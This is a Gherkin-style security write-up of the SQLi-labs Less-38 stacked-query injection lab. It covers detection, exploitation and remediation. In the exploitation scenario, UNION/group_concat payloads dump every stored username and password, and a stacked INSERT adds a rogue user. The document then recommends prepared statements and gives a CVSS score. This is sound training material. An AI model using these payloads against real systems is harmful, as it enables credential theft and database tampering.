## Version 1.4.1
## language: en

Feature:
  TOE:
    SQLI-labs
  Category:
    SQL Injection - GET-Stacked-Query-Injection
  Location:
    http://localhost/sqlilabs/Less-38/ - id (field)
  CWE:
    CWE-89: SQL Injection
      https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173 Discard unsafe inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Check if the site is susceptible to SQL injection
  Recommendation:
    Only use prepared statements for sanitized data

  Background:
  Hacker's software:
    | <Software name> |  <Version>  |
    | Windows         |     10      |
    | Firefox         |   81.0a1    |
    | XAMPP Server    |   7.4.7-0   |

  TOE information:
    Given I am accessing the main page
    And enter in one of the challenge pages
    And MYSQL is the Database Management System
    And the website is running in localhost

  Scenario: Normal use case
    Given I access the page
    When I enter, a message is displayed
    """
    Please input the ID as parameter with numeric value
    """
    Then I set the "id" parameter
    """
    ?id=2
    """
    And a new message appears on the screen
    """
    Your Login name: Angelina
    Your Password: I-kill-you
    """

  Scenario: Static detection
    Given I open the file index.php in the challenge folder
    When I inspect the code, I notice in lines 25, 46 and 48
    """
    $id=$_GET['id'];
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    if (mysqli_multi_query($con1, $sql))
    """
    Then I analyze those lines
    And find out that prepared statements are not used
    And the SQL query is vulnerable to an SQL injection

  Scenario: Dynamic detection
    Given I am on the main page
    When I attempt to inject the "id" parameter as
    """
    ?id=2%20and%202=3--+
    """
    Then The following message appears on the screen
    """
    Your Login name: Angelina
    Your Password: I-kill-you
    """
    When I try to inject the "id" parameter as
    """
    ?id=2"
    """
    Then I get the same message as before
    When I attempt to inject the "id" parameter as
    """
    ?id=2'
    """
    Then I see an error message on the screen
    """
    You have an error in your SQL syntax; check the manual that corresponds
    to your MySQL server version for the right syntax to use near ''2'' LIMIT
    0,1' at line 1
    """
    When I attempt to inject the "id" parameter as
    """
    ?id=1&id=2
    """
    Then A message appears on the screen
    """
    Your Username is: Angelina
    Your Password is: I-kill-you
    """
    When I inject the "id" parameter as
    """
    ?id=1&id=4%20union%20select%201,2,3%20--+
    """
    Then The same message appears on the screen
    When I attempt to inject the "id" parameter as
    """
    ?id=1&id=-99%20union%20select%201,2,3%20--+
    """
    Then nothing appears on screen
    When I attempt to inject the "id" parameter as
    """
    ?id=-2'%20union%20select%201,2,3 --+
    """
    Then The following message appears on the screen
    """
    Your Username is: 2
    Your Password is: 3
    """
    And I can conclude that the query is vulnerable to SQL injection

  Scenario: Exploitation
    Given I am on the challenge page
    When I consider the multiquery
    Then I inject the "id" parameter as
    """
    ?id=-2'%20union%20select%201,group_concat(username),
    group_concat(password)%20from%20users%20; insert into users
    values(99,"test","test")--+
    """
    Then I get the output:
    """
    Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,
    admin1,admin2,admin3,dhakkan,admin4,admin5
    Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,
    admin,admin1,admin2,admin3,dumbo,admin4,admin5
    """
    When I inject the "id" parameter as
    """
    ?id=-2'%20union%20select%201,group_concat(username),
    group_concat(password)%20from%20users%20--+
    """
    Then The following message appears in the screen
    """
    Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,
    admin1,admin2,admin3,dhakkan,admin4,admin5,test
    Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,
    admin,admin1,admin2,admin3,dumbo,admin4,admin5,test
    """
    And I can confirm that the SQL injection with the stacked query worked

  Scenario: Remediation
    Given The site has a vulnerable query against SQL injection
    When The site is using multiquery
    Then I check the following page
    """
    https://dev.mysql.com/doc/apis-php/en
    /apis-php-mysqli.quickstart.multiple-statement.html
    """
    And I found that multiquery does not support multiple prepared statements
    When The site is not sanitazing input data using prepared statements
    Then Considering only one query is needed, the code should be replaced with
    """
    $q1 = $mysqli->prepare("SELECT * FROM users WHERE id=? LIMIT 0,1");
    $q1->bind_param("i", $id);
    $q1->execute();
    $q1->close();
    """
    Given this new code, now the SQL statements are prepared
    When the id parameter is transmited to the Database
    Then it only considers one query and does not need to be correctly escaped
    And That is because, it will be transmited using a diferent protocol
    And a little later than the prepared statement, that works as a template
    Then the SQL query is no longer susceptible to SQL injections

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.6/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.2/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.0/10 (High) - CR:M/IR:M/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:L/MA:L
  Scenario: Correlations
    No correlations have been found to this date 2020-07-28
